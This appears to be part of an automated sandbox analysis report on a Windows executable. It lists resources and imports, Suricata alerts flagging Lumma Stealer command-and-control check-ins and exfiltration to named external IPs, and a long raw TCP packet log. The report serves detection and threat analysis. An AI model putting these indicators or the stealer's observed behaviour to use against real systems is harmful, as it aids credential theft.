RT_DIALOG	0x256dc4	0x3a8	data			0.5438034188034188
RT_DIALOG	0x25716c	0x52c	data			0.5075528700906344
RT_DIALOG	0x257698	0x4ac	data			0.4899665551839465
RT_DIALOG	0x257b44	0x38c	data			0.5154185022026432
RT_DIALOG	0x257ed0	0x388	data			0.5221238938053098
RT_DIALOG	0x258258	0x35c	data			0.5209302325581395
RT_DIALOG	0x2585b4	0x39c	data			0.5270562770562771
RT_DIALOG	0x258950	0x3a4	data			0.5375536480686696
RT_STRING	0x258cf4	0x144	data			0.5987654320987654
RT_STRING	0x258e38	0x170	data			0.6141304347826086
RT_STRING	0x258fa8	0x184	data			0.6134020618556701
RT_STRING	0x25912c	0x160	data			0.6136363636363636
RT_STRING	0x25928c	0x1bc	data			0.5833333333333334
RT_STRING	0x259448	0x180	data			0.6119791666666666
RT_STRING	0x2595c8	0x16c	data			0.5961538461538461
RT_STRING	0x259734	0x194	AmigaOS bitmap font "p", fc_YSize 25856, 25856 elements, 2nd "s", 3rd			0.599009900990099
RT_STRING	0x2598c8	0x18c	data			0.5959595959595959
RT_STRING	0x259a54	0xac	data			0.6569767441860465
RT_GROUP_ICON	0x259b00	0x14	data			1.05
RT_VERSION	0x259b14	0x2f0	SysEx File - IDP			0.5079787234042553
RT_MANIFEST	0x259e04	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualProtect, WriteFile, CreateFileW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle

USER32.dll

MessageBoxA, MessageBoxW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T16:53:57.048510+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49975	172.67.219.133	443	TCP
2025-01-01T16:53:57.543982+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49975	172.67.219.133	443	TCP
2025-01-01T16:53:57.543982+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49975	172.67.219.133	443	TCP
2025-01-01T16:53:58.058458+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49976	172.67.219.133	443	TCP
2025-01-01T16:53:58.549335+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49976	172.67.219.133	443	TCP
2025-01-01T16:53:58.549335+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49976	172.67.219.133	443	TCP
2025-01-01T16:53:59.321990+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49977	172.67.219.133	443	TCP
2025-01-01T16:54:00.998875+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49978	172.67.219.133	443	TCP
2025-01-01T16:54:02.394749+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49979	172.67.219.133	443	TCP
2025-01-01T16:54:04.150189+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49980	172.67.219.133	443	TCP
2025-01-01T16:54:04.600845+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49980	172.67.219.133	443	TCP
2025-01-01T16:54:05.523949+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49981	172.67.219.133	443	TCP
2025-01-01T16:54:07.689652+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49982	172.67.219.133	443	TCP
2025-01-01T16:54:08.175148+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49982	172.67.219.133	443	TCP
2025-01-01T16:54:08.712519+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49983	188.114.97.3	443	TCP
2025-01-01T16:54:09.113380+0100	2008438	ET MALWARE Possible Windows executable sent when remote host claims to send a Text File	1	188.114.97.3	443	192.168.2.5	49983	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 16:53:56.581577063 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:56.581629038 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:56.581727028 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:56.583020926 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:56.583031893 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.048378944 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.048510075 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.051269054 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.051276922 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.051522017 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.103854895 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.130275965 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.130297899 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.130422115 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.543997049 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.544104099 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.544166088 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.546833992 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.546857119 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.546901941 CET	49975	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.546907902 CET	443	49975	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.560827971 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.560888052 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:57.560972929 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.561258078 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:57.561271906 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.058372021 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.058458090 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.059672117 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.059684038 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.059942961 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.061161995 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.061193943 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.061229944 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549318075 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549369097 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549407959 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549433947 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.549439907 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549475908 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549499989 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.549523115 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549556971 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549576044 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.549581051 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.549623013 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.549906969 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.550259113 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.550307035 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.550312996 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.554089069 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.554136038 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.554141998 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.603851080 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.641575098 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.641711950 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.641735077 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.641760111 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.641767979 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.641823053 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.641828060 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.641840935 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.641892910 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.642086983 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.642102003 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.642112017 CET	49976	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.642117023 CET	443	49976	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.842051983 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.842087030 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:58.842305899 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.842622995 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:58.842633963 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:59.321845055 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:59.321990013 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:59.323334932 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:59.323343039 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:59.323579073 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:53:59.324834108 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:59.324997902 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:53:59.325069904 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:00.357475996 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:00.357637882 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:00.357714891 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:00.357893944 CET	49977	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:00.357914925 CET	443	49977	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:00.479813099 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:00.479866028 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:00.479943037 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:00.480245113 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:00.480256081 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:00.998765945 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:00.998874903 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.000071049 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.000081062 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:01.000323057 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:01.003767014 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.003863096 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.003895998 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:01.004096985 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.047333956 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:01.696732044 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:01.696849108 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:01.697000980 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.697074890 CET	49978	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.697096109 CET	443	49978	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:01.907211065 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.907257080 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:01.907330036 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.907665968 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:01.907680988 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:02.394669056 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:02.394748926 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:02.397950888 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:02.397964001 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:02.398623943 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:02.402013063 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:02.402128935 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:02.402170897 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:02.402235031 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:02.402244091 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:03.042284012 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:03.042377949 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:03.042431116 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:03.049680948 CET	49979	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:03.049694061 CET	443	49979	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:03.661529064 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:03.661576986 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:03.661648989 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:03.661964893 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:03.661981106 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:04.150114059 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:04.150188923 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:04.151606083 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:04.151612997 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:04.151845932 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:04.153749943 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:04.153836966 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:04.153844118 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:04.600857973 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:04.600958109 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:04.601023912 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:04.601174116 CET	49980	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:04.601193905 CET	443	49980	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.046914101 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.046977997 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.047045946 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.047339916 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.047353983 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.523829937 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.523948908 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.533010006 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.533019066 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.533261061 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.537550926 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.545284033 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.545312881 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.545429945 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.545459986 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.545564890 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.545615911 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.545721054 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.545742989 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.545866966 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.545895100 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.546020985 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.546037912 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.546050072 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.546061039 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.546186924 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.546211004 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.546231985 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.546355963 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.546382904 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.555860043 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.556004047 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.556027889 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:05.556051016 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.556094885 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:05.561425924 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.177118063 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.177237988 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.177357912 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.177555084 CET	49981	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.177573919 CET	443	49981	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.232284069 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.232326984 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.232398033 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.232728958 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.232743025 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.689565897 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.689651966 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.690893888 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.690902948 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.691147089 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:07.692368984 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.692384958 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:07.692481041 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:08.175168037 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:08.175295115 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:08.175353050 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:08.190886974 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:08.190903902 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:08.190917969 CET	49982	443	192.168.2.5	172.67.219.133
Jan 1, 2025 16:54:08.190922976 CET	443	49982	172.67.219.133	192.168.2.5
Jan 1, 2025 16:54:08.235871077 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:08.235905886 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:08.235974073 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:08.240042925 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:08.240057945 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:08.712344885 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:08.712518930 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:08.713994026 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:08.714004040 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:08.714243889 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:08.715749025 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:08.759336948 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022303104 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022355080 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022387028 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022418022 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022450924 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022481918 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022510052 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022589922 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.022589922 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.022589922 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.022618055 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.022667885 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.022932053 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.026983976 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.027018070 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.027044058 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.027049065 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.027059078 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.027102947 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.110608101 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.110735893 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.110766888 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.110778093 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.110810995 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.110871077 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.111217022 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.111660957 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.111692905 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.111701012 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.111707926 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.111747026 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.111747980 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.111759901 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.111814976 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.112376928 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.112426043 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.112462997 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.112473965 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.112509966 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.112552881 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.112560034 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.113302946 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.113336086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.113349915 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.113357067 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.113393068 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.113398075 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.113408089 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.113451004 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.113457918 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.151631117 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.151669025 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.151685953 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.151695013 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.151851892 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.199167013 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.199275017 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.199306011 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.199320078 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.199326992 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.199342012 CET	443	49983	188.114.97.3	192.168.2.5
